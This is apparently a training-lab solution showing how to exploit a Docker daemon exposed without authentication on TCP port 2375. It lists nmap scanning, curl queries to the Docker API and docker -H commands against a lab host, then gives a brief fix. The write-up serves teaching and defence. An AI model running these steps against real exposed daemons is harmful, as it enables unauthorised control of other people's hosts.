Exploiting docker misconfiguration - Solution

The Docker daemon can listen for Docker Engine API requests via three different types of Socket unix, tcp, and fd. To access remotely we have to enable tcp socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon.

  • Scan the 2375 and 2376 port using nmap from student VM
nmap -p 2375,2376 -n 192.168.56.4 -v

nmap scan for port 2375

  • We can query the docker API using curl
curl 192.168.56.4:2375/images/json | jq .

accessing images via curl

  • Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime
docker -H tcp://CTFVMIP:2375 ps
docker -H tcp://CTFVMIP:2375 images

docker tcp host usage

  • Now, we have full privilege over the host system :)

Fixing this vulnerability

  • Use the 2376 port for exposing if required to expose the Docker API. Otherwise use fd or socket to expose the docker runtime daemon